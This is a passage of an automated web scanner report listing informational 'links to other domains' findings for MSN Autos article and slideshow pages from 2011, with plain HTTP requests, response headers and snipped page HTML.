<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XJA97mi-6p5wbgCfgpZtVRPa7DzMQhw85?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xa7QDPa0ksIKMMlm6QxG3DraExnprjte_?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-aac36e1645e7b117.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Mickey Streater
..(Not the Liar)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-aac36e1645e7b117.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-c7c240ed082eead0.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Brad Hardy
..(american strong)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-c7c240ed082eead0.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
</div>..<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalauto.112.2O7.net/b/ss/msnportalauto/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.73. http://editorial.autos.redacted/article.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /article.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /article.aspx?cp-documentid=1167044&icid=autos_0252&GT1=22017 HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:47:17 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA51
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=8d404cd3ef544a8a9e3f85bf2e438f48; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=B0B157AC2BEC42F3878BD3D8F218E401; domain=.autos.redacted; expires=Thu, 18-Aug-2011 16:47:17 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 89785

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=A0">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296406037&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Feditorial.autos.msn.com%2Farticle.aspx%3Fcp-documentid%3D1167044%26icid%3Dautos_0252%26GT1%3D22017&amp;lc=1033&amp;id=72801" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Ford+2010+profit+highest&amp;form=MSNS06">ford highest profit</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+green+loan&amp;form=MSNS06">GM 'green' loan</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+Volt+sales+year%27s+end&amp;form=MSNS06">volt sales</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=south+korea+kia+net+profit&amp;form=MSNS06">kia motors hits record</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
<p>What would you say if we told you the <a href="http://www.bing.com/search?q=best+engine&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;">best engine</a>
...[SNIP]...
</a> is revamping the F-150's entire engine lineup for 2011, adding, among others, a twin-turbocharged 3.5-liter EcoBoost V6. It bests the two available V8s for <a href="http://www.bing.com/search?q=fuel+economy&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;">fuel economy</a>
...[SNIP]...
<p><a href="http://www.bing.com/images/search?q=2011+Ford+F-150&amp;qpvt=2011+Ford+F-150&amp;FORM=A0#" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGLz_0ZyZ6xHXDb4jvJuhua50GaZ3oJGr?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XXU9UPpUbzptf9sXdGMvh6I5MpAz1e5J3?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-b28ec39d922a6bc1.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Someone
..(American Made1111)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-b28ec39d922a6bc1.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xtf-DYVCnVEFgXIoKJvq2paSj3S625_Xm?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XyB-HVfSz2pxlapWPdFl5byirZzY7uomp?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
</span>&#160; Why do so many of US drive the bloated gas guzzlers?<img src="http://us.social.s-redacted/s/images/emoticons/angry_smile.gif" alt="Angry" class="emoticon" />We are victims of advertising<img src="http://us.social.s-redacted/s/images/emoticons/regular_smile.gif" alt="Smile" class="emoticon" />!</p>
...[SNIP]...
<p>The world need now is love,opps,no it need a gas efficient/electric optional car NOW(quoted circa 1974!!!<img src="http://us.social.s-redacted/s/images/emoticons/dog.gif" alt="Dog face" class="emoticon" />)</p>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xxb4-1Dy08C7YfTxwSLPMuVw7rrLTmQ4Y?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-b8331f3fa1194109.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Robert Johnston
..(spike923)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-b8331f3fa1194109.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://blufiles.storage.redacted/y1mGdEjReIhfZR_xfYIQSJEuPvDKEBa4HTjE8z0t0-6WGYt0wycsVz75MPdX80tpSY8asDZfALZut5zShwrIOd8-Q" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XTMGfCyZMtEkb6ViLYz3iAOPjpyWVgR00?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XVs-zmX5sWtqT053D1V-dMZD3eVulaCmg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XS_-DhNXnTIljAlYeeWufWs-No4trUwUM?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XfMzEUIm9iRyppINUxXJ51b_MKwC7vmj6?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XCZv0wTFzDX35967uCLHGWyHhF0O1txen?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XitRPmbKqH6TNTv2oFfBiYQFGYc9QIdjV?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-072dc8c7b411d87a.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Lee Wall</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-072dc8c7b411d87a.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://blufiles.storage.redacted/static/29" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XOwzuSOA00Xa8NL3ql7mccj602hybiQPA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XyiDak0zPyY8ZrhokyR9iNRRhd1GC66Nd?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XitRPmbKqH6TNTv2oFfBiYQFGYc9QIdjV?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XdU2BQldGrXyg_eb3ma5ndkaDHXNYxrS9?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
</div>..<script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalauto.112.2O7.net/b/ss/msnportalauto/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.74. http://editorial.autos.redacted/slideshow.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /slideshow.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /slideshow.aspx?cp-documentid=1166546&icid=autos_1656&GT1=22013 HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 23:46:09 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA56
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=a4b4d244214d4bc5a38c0f81028e17e6; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=47B268FB30464282A4F8BA594AEAC481; domain=.autos.redacted; expires=Wed, 17-Aug-2011 23:46:09 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 105936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li><a href="http://www.bing.com/videos/browse?from=en-us_msnhp">Video</a>
...[SNIP]...
<li><a href="http://insidemsn.wordpress.com">Corrections &amp; Clarifications</a>
...[SNIP]...
<li><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a></li><li><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB">Feedback</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<span class="blogo"><a href="http://www.bing.com/search?FORM=A0">Bing</a>
...[SNIP]...
<li class="first"><a href="http://mail.live.com/">Hotmail</a></li><li id="msg"><a href="http://download.live.com/?sku=messenger">Messenger</a></li><li class="last"><a href="https://login.live.com/login.srf?wa=wsignin1.0&amp;rpsnv=11&amp;ct=1296344769&amp;rver=5.5.4177.0&amp;wp=LBI&amp;wreply=http:%2F%2Feditorial.autos.msn.com%2Fslideshow.aspx%3Fcp-documentid%3D1166546%26icid%3Dautos_1656%26GT1%3D22013&amp;lc=1033&amp;id=72801" class="dMSNME_1">Sign in</a>
...[SNIP]...
<div><a id="wslink" href="http://www.bing.com/search">Search the web</a>
...[SNIP]...
<li class="first"><a href="http://www.bing.com/search?q=Ford+2010+profit+highest&amp;form=MSNS06">ford highest profit</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+green+loan&amp;form=MSNS06">GM 'green' loan</a>
...[SNIP]...
<li><a href="http://www.bing.com/search?q=GM+Volt+sales+year%27s+end&amp;form=MSNS06">volt sales</a>
...[SNIP]...
<li class="last"><a href="http://www.bing.com/search?q=south+korea+kia+net+profit&amp;form=MSNS06">kia motors hits record</a>
...[SNIP]...
</div><a id="hplink" href="http://www.myhomeredacted/">Make redacted your home page</a>
...[SNIP]...
</div><script type="text/javascript" language="javascript" src="http://img.widgets.video.s-redacted/js/embed.js"></script>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XsC4ZRmfeIEzEEQW5YCixM1lXYonrWoK7?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XGXMlAxWeDCbzyoCuBzwzvlb7pBVrwr34?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-d83c9b6bbd817d47.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">Someone</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-d83c9b6bbd817d47.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X5tTHfv3Bm8_l2BgWB7OTLnEh7WGUBHQ5?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-809a54fe28e4fb91.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">G
..(oldsfun)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-809a54fe28e4fb91.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<div class="ic-usr-nm"><a href="http://cid-fabb604b537e099b.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US">tomas rodriguez
..(faithfulguy)
</a>
...[SNIP]...
<div class="ic-usr-img"><a class="ic-usr-pro-url" href="http://cid-fabb604b537e099b.profile.live.com/msn/posts?mkt=en-US&amp;domain=en-US"><img alt="avatar" src="http://blufiles.storage.redacted/y1mvBJI1-3_evpb5PLbkQ7UhKwWBlu-_k15jCbRD5IiL3-jDSI4NgsiHW_RMTWTTS42RGem4BaOcYI7Ro-W8YeGNebwJATcVulU" />
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XMnI-raJfRqPvRnEeB_hC1RKeNIy0lfkA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XAOGnzxr5PxuVa8kggGJBInauOzJMDUUg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/X391Bn0BHZY_-wopsWAO-dk8XKY4wrjwM?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XcdDNRXWFQsUczA6RfKwNPNLNf7lMyoD8?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xrx5RHb8jEF9RC6BEHp4hC_RTC2eAWJfg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XUMaGfQinvYL_rkKruQ9NhYT6Cn6CVbzD?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XmuwNUslX0aJ6_2eqL8Bmq-MyAkfuL9kg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/Xuo2PiOvdO1KWWELNX2bjqCDPhTQFttLg?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XwKJJgcnOzooBeiHlda2GVW4uprKR5o1M?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XXVkc4CMEweMYJswTzdbHi7fZPcM_FZVA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XCxJJ9-mWAInyzGx8O8xUausF8ubdPTmG?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XX30fj0eX5P7OoAYvtTHqv_xLne3bxnx7?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<a class="ic-usr-pro-url" href="http://social.msn.com/profile/XXzi9saYszLgVxxAD4kLhE2ZEBNqayOEA?mkt=en-us"><img alt="avatar" src="http://us.social.s-redacted/s/images/bluemannxl.png" /></a>
...[SNIP]...
<span>Please help us to maintain a healthy and vibrant community by reporting any illegal or inappropriate behavior. If you believe a message violates the<a id="raconductcode" class="iucRptLnk" href="http://help.live.com/help.aspx?mkt=en-gb&amp;project=tou&amp;querytype=keyword&amp;query=coc" title="View the code of conduct in a new window">Code of Conduct</a>
...[SNIP]...
<p>With so many new vehicles on the market, picking just one is a challenge, especially if you're looking for a new <a href="http://www.bing.com/search?q=pickup+truck&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;">pickup truck</a>. Not only are there multiple manufacturers, each with more than one model to choose from, but each pickup comes in a bewildering variety of <a href="http://www.bing.com/search?q=cab+styles&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;">cab styles</a>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Ford+Ranger&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/images/search?q=Nissan+Frontier&amp;FORM=A0#" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Dodge+Dakota+Accessories&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<p><a href="http://www.bing.com/search?q=Ford+F-350+Super+Duty&amp;src=IE-SearchBox&amp;FORM=A0" onclick="window.open(this.href);return false;"><strong>
...[SNIP]...
<li>Become a fan of <a href="http://www.facebook.com/MSNAutos" onclick="window.open(this.href);return false;">MSN Autos on Facebook</a>
...[SNIP]...
</em> <a href="https://canvas.dealix.com/newcars/default.aspx?refid=58940&amp;detid=88000&amp;lnx=msndlx" onclick="window.open(this.href);return false;">get a free price quote</a>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://cache-01.cleanprint.net/cp/ccg?divId=2630"></script>
...[SNIP]...
<div class="child c1 first"><script type="text/javascript" src="http://autos.msn.us.intellitxt.com/ast/js/msn/autos.msn_cs.js"></script>
...[SNIP]...
<li class="first"><a href="http://go.microsoft.com/fwlink/?LinkId=74170">MSN privacy</a>
...[SNIP]...
<div><img src="http://msnportalauto.112.2O7.net/b/ss/msnportalauto/1/H.1--NS/0" height="1" width="1" alt="" /></div>
...[SNIP]...

22.75. http://editorial.autos.redacted/slideshow.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://editorial.autos.redacted
Path:   /slideshow.aspx

Issue detail

The page was loaded from a URL containing a query string:

The response contains the following links to other domains:

Request

GET /slideshow.aspx?cp-documentid=1166546&icid=autos_1656&GT1=22013 HTTP/1.1
Host: editorial.autos.redacted
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 30 Jan 2011 16:47:26 GMT
Server: Microsoft-IIS/6.0
P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
S: BLUMPPRENA55
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Pragma: no-cache
Set-Cookie: MC1=V=3&GUID=4f87324529cb4e638fd14430d57d473f; domain=.redacted; expires=Mon, 04-Oct-2021 16:00:00 GMT; path=/
Set-Cookie: MUID=BA595D0452504782A520F9E26ACEF202; domain=.autos.redacted; expires=Thu, 18-Aug-2011 16:47:25 GMT; path=/
Cache-Control: no-cache
Content-Type: text/html; charset=utf-8
Content-Length: 104154

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xml:lang="en-us" lang="en-us" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://w
...[SNIP]...
<li class="first"><a href="http://www.bltwy.com">BLTWY</a>
...[SNIP]...
<li class="c3"><a href="http://msn.foxsports.com/">Sports</a>
...[SNIP]...
<li class="first"><a href="http://msn.foxsports.com/mlb">MLB</a></li><li><a href="http://msn.foxsports.com/nascar ">NASCAR</a></li><li><a href="http://msn.foxsports.com/nba">NBA</a></li><li><a href="http://msn.foxsports.com/collegebasketball">NCAA Basketball</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/cfb">NCAA Football</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nfl"><strong>
...[SNIP]...
<li><a href="http://msn.foxsports.com/nhl">NHL</a></li><li><a href="http://msn.foxsports.com/fantasy">Play Fantasy</a>
...[SNIP]...
<li><a href="http://msn.foxsports.com/foxsoccer">Soccer</a></li><li><a href="http://msn.foxsports.com/video?from=en-us_msnhp">Video Highlights</a>
...[SNIP]...
<li><a href="http://msn.careerbuilder.com?siteid=cbmsn_home&amp;sc_cmp1=JS_MSN_Home">Careers &amp; Jobs</a>
...[SNIP]...
<li><a href="http://www.delish.com/"> Cooking</a>
...[SNIP]...
<li><a href="http://www.bing.com/travel/?cid=msn_nav_lifestyle&amp;FORM=MSNNAV "> Travel</a>
...[SNIP]...
<li><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
